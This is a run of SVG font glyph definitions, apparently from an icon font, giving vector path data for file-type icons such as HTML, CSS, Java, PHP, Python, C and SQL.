<glyph unicode="&#xec5c;" glyph-name="file-html" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160.235 608c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM896 352v-32h-160v224h32v-192h128zM416 512v-192h32v192h64v32h-160v-32h64zM288 448v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96zM624 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96z" />
<glyph unicode="&#xec5d;" glyph-name="file-html2" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM896 352h-128v192h-32v-224h160v32zM416 512v-192h32v192h64v32h-160v-32h64zM288 448h-96v96h-32v-224h32v96h96v-96h32v224h-32v-96zM624 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96z" />
<glyph unicode="&#xec5e;" glyph-name="file-css" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM416 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM512.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec5f;" glyph-name="file-css2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM416 384l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM512.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec60;" glyph-name="file-java" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160.235 608c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM624 376l48 168h32l-64-224h-32l-64 224h32l48-168zM160 416v-31.811c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v159.811h-32v-160.295c0-17.274-14.312-31.705-31.967-31.705h-32.067c-17.801 0-31.967 14.327-31.967 32v32h-32zM480 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM415.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM864 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM799.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xec61;" glyph-name="file-java2" d="M159.817 640c-52.918 0-95.817-42.952-95.817-95.961v-224.078c0-52.998 42.898-95.961 95.817-95.961h736.366c52.918 0 95.817 42.952 95.817 95.961v224.078c0 52.998-42.898 95.961-95.817 95.961h-736.366zM624 376l48 168h32l-64-224h-32l-64 224h32l48-168zM160 416h32v-32c0-17.673 14.165-32 31.967-32h32.067c17.655 0 31.967 14.431 31.967 31.705v160.295h32v-159.811c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v31.811zM480 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM415.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM864 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM799.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xec62;" glyph-name="file-psd" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM512.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM640 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM672 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xec63;" glyph-name="file-psd2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM512.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM640 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM672 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xec64;" glyph-name="file-ai" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM608 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM480 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM415.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xec65;" glyph-name="file-ai2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM608 512h-32v32h96v-32h-32v-160h32v-32h-96v32h32v160zM480 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM415.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xec66;" glyph-name="file-bmp" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 424v120h95.844c35.551 0 64.156-28.654 64.156-64 0-19.21-8.367-36.327-21.641-48.015 13.274-11.727 21.641-28.878 21.641-47.985 0-35.593-28.724-64-64.156-64h-95.844v104zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM288 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM528 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec67;" glyph-name="file-bmp2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 424v-104h95.844c35.432 0 64.156 28.407 64.156 64 0 19.107-8.366 36.258-21.641 47.985 13.273 11.687 21.641 28.805 21.641 48.015 0 35.346-28.605 64-64.156 64h-95.844v-120zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM288 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM528 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec68;" glyph-name="file-dwg" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM592 320h-16l-48 96-48-96h-32v224h32v-160l32 64h32l32-64v160h32v-224h-16zM256 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xec69;" glyph-name="file-dwg2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM592 320h16v224h-32v-160l-32 64h-32l-32-64v160h-32v-224h32l48 96 48-96h16zM256 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xec6a;" glyph-name="file-eps" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM288 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec6b;" glyph-name="file-eps2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM288 416h96v32h-96v64h128v32h-160v-224h160v32h-128v64zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec6c;" glyph-name="file-tiff" d="M223.764 640h672.471c52.918 0 95.764-42.963 95.764-95.961v-224.078c0-53.009-42.875-95.961-95.764-95.961h-672.471c-52.918 0-95.764 42.963-95.764 95.961v224.078c0 53.009 42.875 95.961 95.764 95.961zM224.115 608c-35.41 0-64.115-28.806-64.115-63.745v-224.511c0-35.205 28.472-63.745 64.115-63.745h671.77c35.41 0 64.115 28.806 64.115 63.745v224.511c0 35.205-28.472 63.745-64.115 63.745h-671.77zM288 512v-192h32v192h64v32h-160v-32h64zM448 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM576 448v64h128v32h-160v-224h32v96h96v32h-96zM768 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xec6d;" glyph-name="file-tiff2" d="M223.764 640h672.471c52.918 0 95.764-42.963 95.764-95.961v-224.078c0-53.009-42.875-95.961-95.764-95.961h-672.471c-52.918 0-95.764 42.963-95.764 95.961v224.078c0 53.009 42.875 95.961 95.764 95.961zM288 512v-192h32v192h64v32h-160v-32h64zM448 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM576 448v64h128v32h-160v-224h32v96h96v32h-96zM768 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xec6e;" glyph-name="file-ots" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM512 512v-192h32v192h64v32h-160v-32h64zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec6f;" glyph-name="file-ots2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM512 512v-192h32v192h64v32h-160v-32h64zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec70;" glyph-name="file-php" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 448v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec71;" glyph-name="file-php2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 448h-96v96h-32v-224h32v96h96v-96h32v224h-32v-96zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec72;" glyph-name="file-py" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM352 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM384 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 416v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96z" />
<glyph unicode="&#xec73;" glyph-name="file-py2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM352 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM384 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 416l64 96v32h-32v-32l-48-72-48 72v32h-32v-32l64-96v-96h32v96z" />
<glyph unicode="&#xec74;" glyph-name="file-c" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM608 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xec75;" glyph-name="file-c2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM608 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xec76;" glyph-name="file-sql" d="M565.621 323.752l28.321-28.321 22.627 22.627-24.102 24.102c9.681 11.209 15.533 25.86 15.533 42.029v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c7.645 0 14.978 1.321 21.777 3.752zM537.373 352h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM800 352v-32h-160v224h32v-192h128z" />
